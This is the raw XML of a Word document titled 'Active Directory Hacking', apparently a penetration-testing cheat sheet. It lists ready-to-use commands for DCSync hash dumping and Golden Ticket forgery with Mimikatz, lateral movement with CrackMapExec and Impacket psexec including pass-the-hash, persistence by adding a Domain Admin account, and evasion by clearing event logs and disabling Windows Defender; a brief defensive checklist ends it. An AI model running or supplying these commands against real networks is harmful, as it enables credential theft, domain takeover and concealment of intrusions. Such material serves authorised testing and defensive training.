    <w:p w14:paraId="2B21A102" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>lsadump::dcsync /user:Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442AA4C4"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This command retrieves the NTLM hash of any user, including privileged accounts like Domain Admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFC148"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4. Golden Ticket Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A6A4FA"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Generate a Kerberos Golden Ticket using Mimikatz to impersonate any user, including Domain Admins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C13B8AD" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>kerberos::golden /user:&lt;user&gt; /domain:&lt;domain&gt; /sid:&lt;domain_sid&gt; /krbtgt:&lt;krbtgt_hash&gt; /id:&lt;RID&gt; /target:&lt;domain_controller&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0A4FB" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:num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krbtgt_hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: You must extract the krbtgt hash before creating a Golden Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE60CBF" w14:textId="27242425" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3083D3E1" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Lateral Movement Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C642612"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1. SMB Lateral Movement with CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39155762"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Use CrackMapExec to execute commands on remote systems over SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C61216" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:lastRenderedPageBreak/>
        <w:t>crackmapexec smb &lt;target_ip&gt; -u &lt;user&gt; -p &lt;password&gt; --exec-method smbexec --command "whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B09469"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2. Remote Code Execution with PsExec (Impacket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A3F63"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Impacket’s psexec.py can be used to execute commands on a remote machine via SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E8F1F" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>psexec.py domain/user:password@192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E584DF"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You can also use NTLM hashes with this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2730AF" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>psexec.py -hashes &lt;lm&gt;:&lt;nt&gt; domain/user@192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508382F7"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3. WMI Execution with CrackMapExec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60440BF4" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>crackmapexec smb &lt;target_ip&gt; -u &lt;user&gt; -p &lt;password&gt; --exec-method wmiexec --command "whoami"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8B81C2" w14:textId="06CDFB08" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFDBB74" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Persistence Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300D3206"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1. Adding a User to Domain Admins Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544E4B4"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You can add a new user to the Domain Admins group to maintain persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F067CAC" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>net user &lt;username&gt; &lt;password&gt; /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E99D8F" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>net group "Domain Admins" &lt;username&gt; /add /domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E774C"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2. Golden Ticket Persistence with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C43A4A9"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Golden Tickets can be generated and reused to maintain persistent access as any user (e.g., Domain Admin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A109939" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:lastRenderedPageBreak/>
        <w:t>kerberos::golden /user:&lt;user&gt; /domain:&lt;domain&gt; /sid:&lt;domain_sid&gt; /krbtgt:&lt;krbtgt_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2F188" w14:textId="1CCD3098" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C88AF5E" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Defensive Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BC957F"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1. Clearing Event Logs with PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BFF5CA" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>wevtutil cl System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A451941" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>wevtutil cl Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E6A868" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>wevtutil cl Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D776CC"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2. Disabling Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F541DC" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Set-MpPreference -DisableRealtimeMonitoring $true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EC4EEB" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3. Bypassing Antivirus with Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C577A" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use obfuscation or AMSI bypass techniques to evade antivirus detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D4AF73" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="CodeSnippets"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>powershell -ep bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5B973C" w14:textId="00F785F0" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="00111151">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C5A513" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="00111151" w:rsidRDefault="00111151" w:rsidP="007144EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00111151">
        <w:t>Defensive Measures Against AD Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045AA04C" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="002A5E61" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enforce Strong Password Policies</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Use complex passwords, especially for privileged accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C447A5" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="002A5E61" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Monitor AD Event Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Track suspicious events like DCSync attempts, Golden Ticket usage, and lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD5C15" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="002A5E61" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Restrict Administrative Privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Use the principle of least privilege for all accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C274FD" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="002A5E61" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Multi-factor Authentication (MFA)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Especially for sensitive accounts like Domain Admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0EBBD8" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="002A5E61" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Regularly Rotate krbtgt Key</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: To protect against Golden Ticket attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C490E35" w14:textId="77777777" w:rsidR="00111151" w:rsidRPr="002A5E61" w:rsidRDefault="00111151" w:rsidP="002A5E61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable Unnecessary Services</w:t>
      </w:r>
      <w:r w:rsidRPr="002A5E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Disable LLMNR and NBT-NS to prevent Responder attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17731FE0" w14:textId="77777777" w:rsidR="00160BE7" w:rsidRPr="00111151" w:rsidRDefault="00160BE7" w:rsidP="002A5E61"/>
    <w:sectPr w:rsidR="00160BE7" w:rsidRPr="00111151" w:rsidSect="002F2870">
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="8391" w:h="11906" w:code="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C5C63" w14:textId="77777777" w:rsidR="0030372C" w:rsidRDefault="0030372C" w:rsidP="005938DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6D21084D" w14:textId="77777777" w:rsidR="0030372C" w:rsidRDefault="0030372C" w:rsidP="0059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F7E74" w14:textId="77777777" w:rsidR="005938DE" w:rsidRDefault="005938DE">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E9CEE57" w14:textId="77777777" w:rsidR="005938DE" w:rsidRDefault="00593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A0F14" w14:textId="77777777" w:rsidR="0030372C" w:rsidRDefault="0030372C" w:rsidP="005938DE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="247D5EA4" w14:textId="77777777" w:rsidR="0030372C" w:rsidRDefault="0030372C" w:rsidP="00593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CB16" w14:textId="5531B28C" w:rsidR="005938DE" w:rsidRDefault="00111151">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:t>Active Directory Hacking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6F6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91B4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7F89"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1AD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D432E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E142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6A6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D1C4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B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="219E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EA0DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E4CC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E5622A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B222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040B6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8BC0B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5E6417"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="027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16BCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="77E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83063"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA1A8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438CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="231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0254A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E7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7348A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E1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61312"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="975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B33EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB4C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965677"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB82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8D4574"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BA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433F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="572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A6870"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9DEA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FA3AC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="889A0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66712"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA8CD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402FD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="422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01939"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C94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70896"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37007B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FF61C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0096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340F70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D38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81989"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEE4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6600C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="04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C46F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81088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CD2DA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B18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17313"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0801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EB3CD2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F458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D0A1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80C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A1FDC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3DACA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E8C7A76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="938C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042BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEB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6090D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B80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03DF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A05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9F01E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578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02332"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D582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45F73"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFB0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8D0CFC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3B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13560E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50B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E084F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D752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2C46BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D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B7F8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C62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C577D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DFCD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2184A13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00C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1359A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="381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C2E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23B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A321EF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA5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2D475D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22D82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FE70484"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
